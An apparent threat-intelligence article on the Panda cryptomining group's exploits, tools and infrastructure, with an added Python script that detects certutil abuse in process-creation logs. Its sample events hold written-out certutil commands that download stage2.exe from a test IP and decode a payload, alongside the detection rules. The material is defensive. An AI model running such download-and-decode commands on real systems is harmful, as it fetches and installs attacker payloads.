The attackers use exploits leaked by the Shadow Brokers together with the open-source tool Mimikatz to harvest credentials.
The Panda group was first linked to last year's MassMiner campaign and later to another cryptomining campaign. Since then it has considerably expanded its techniques, exploits and payloads.
According to the researchers, the attackers have hit organizations across many sectors, among them banks, healthcare providers, telecommunications companies and IT service firms.
In July 2018 the attackers exploited an Oracle WebLogic vulnerability (CVE-2017-10271) to install a cryptominer associated with MassMiner. They also scanned the internet at scale for vulnerable servers and attempted to exploit an Apache Struts 2 vulnerability (CVE-2017-5638), then used PowerShell to install the miner payload.
Talos estimates that Panda has mined Monero worth around 100,000 dollars.
The group has also been observed using the Gh0st RAT in its attacks.
In January 2019 the attackers exploited a vulnerability in the ThinkPHP web framework (CNVD-2018-24942) to spread their malware. Different exploits were used in March, but the tactics, techniques and procedures were so similar that the researchers attributed that activity to the same group.
Panda then switched to another first-stage payload, which abuses the built-in Windows certutil tool to download the secondary payload.
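The certutil download step is a good detection opportunity, because a certificate utility has no business fetching executables from the internet. The following Python snippet is an added example written for this page, not code from Talos or from the Panda payloads. It assumes Sysmon-style process-creation fields (Image, OriginalFileName, CommandLine, ParentImage), and the events it checks are constructed samples, not real telemetry. It goes slightly beyond the article: besides the -urlcache download it flags the -verifyctl download variant and certutil's -decode option, both commonly used by the same class of downloader payloads, and it catches a renamed copy of the binary through its OriginalFileName.

```python
"""Flag certutil.exe abused as a downloader or decoder in process-creation logs.

Added example for this page (not Talos or Panda code). Field names follow Sysmon
Event ID 1; the SAMPLE_EVENTS below are constructed, not real log records.
"""
import ntpath
import re
from dataclasses import dataclass


@dataclass
class ProcessEvent:
    image: str               # full path of the process that started
    original_file_name: str  # PE version-info name; survives renaming the binary on disk
    command_line: str
    parent_image: str


URL_RE = re.compile(r"^(?:https?|ftp)://\S+", re.IGNORECASE)

# Parents that should not be launching certutil on a healthy host: web/app servers
# (the WebLogic and Struts entry points in the article run under java.exe / w3wp.exe)
# and script hosts such as the PowerShell stage the article mentions.
SUSPICIOUS_PARENTS = {
    "java.exe", "w3wp.exe", "httpd.exe", "php.exe",
    "powershell.exe", "wscript.exe", "cscript.exe", "mshta.exe",
}


def is_certutil(ev: ProcessEvent) -> bool:
    """Match on the on-disk name OR the PE original name, so a renamed copy still hits."""
    names = {ntpath.basename(ev.image).lower(), ev.original_file_name.lower()}
    return "certutil.exe" in names


def parse_switches(command_line: str):
    """Return (set of switches, list of URL arguments).

    certutil accepts switches with either '-' or '/'; quotes are stripped so that
    quoted paths do not hide switch tokens.
    """
    tokens = [t.strip('"') for t in command_line.split()]
    switches = {t[1:].lower() for t in tokens if len(t) > 1 and t[0] in "-/"}
    urls = [t for t in tokens if URL_RE.match(t)]
    return switches, urls


def classify(ev: ProcessEvent) -> list:
    """Return the rule names that fire for one event (empty list if none)."""
    if not is_certutil(ev):
        return []
    switches, urls = parse_switches(ev.command_line)
    hits = []
    # A URL argument is required: a bare 'certutil -urlcache' only lists the cache.
    if urls and ({"urlcache", "verifyctl"} & switches):
        hits.append("certutil_remote_download")
    if {"decode", "decodehex"} & switches:
        hits.append("certutil_payload_decode")
    # Second signal: who spawned it. A server or script host parent fits the
    # exploit-then-download chain described in the article.
    if hits and ntpath.basename(ev.parent_image).lower() in SUSPICIOUS_PARENTS:
        hits.append("spawned_by_server_or_script_host")
    return hits


def scan(events) -> list:
    """Return [(event_index, hits), ...] for every event that triggered a rule."""
    results = []
    for i, ev in enumerate(events):
        hits = classify(ev)
        if hits:
            results.append((i, hits))
    return results


# Constructed sample events (hypothetical paths and RFC 5737 test address).
SAMPLE_EVENTS = [
    ProcessEvent(r"C:\Windows\System32\certutil.exe", "CertUtil.exe",
                 r"certutil.exe -urlcache -split -f http://198.51.100.7/stage2.exe C:\Users\Public\stage2.exe",
                 r"C:\Oracle\Middleware\jdk\bin\java.exe"),
    ProcessEvent(r"C:\Windows\Temp\svchost.exe", "CertUtil.exe",   # renamed copy of certutil
                 r"svchost.exe /urlcache /f http://198.51.100.7/m.dat C:\Windows\Temp\m.dat",
                 r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"),
    ProcessEvent(r"C:\Windows\System32\certutil.exe", "CertUtil.exe",
                 r"certutil -decode C:\Users\Public\m.dat C:\Users\Public\m.exe",
                 r"C:\Windows\System32\cmd.exe"),
    ProcessEvent(r"C:\Windows\System32\certutil.exe", "CertUtil.exe",   # benign admin use
                 r"certutil.exe -verifystore -user My",
                 r"C:\Windows\System32\cmd.exe"),
    ProcessEvent(r"C:\Program Files\Google\Chrome\Application\chrome.exe", "chrome.exe",
                 r'"C:\Program Files\Google\Chrome\Application\chrome.exe" http://example.com',
                 r"C:\Windows\explorer.exe"),
]


if __name__ == "__main__":
    for idx, hits in scan(SAMPLE_EVENTS):
        print(f"event {idx}: {', '.join(hits)}  <- {SAMPLE_EVENTS[idx].command_line}")
```

The download rule deliberately requires a URL argument so that a plain cache listing does not fire, and the parent-process check is kept as a separate signal rather than a precondition, because an interactive attacker will often launch certutil from cmd.exe after the initial foothold. Matching on OriginalFileName matters: copying certutil.exe to another name is a cheap evasion that defeats image-path-only rules.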
Panda, however, pays little attention to its own operational security: many of its old and new domains are hosted on the same IP address, which makes its infrastructure easy to cluster, its TTPs are similar across campaigns, and its payloads are not particularly sophisticated.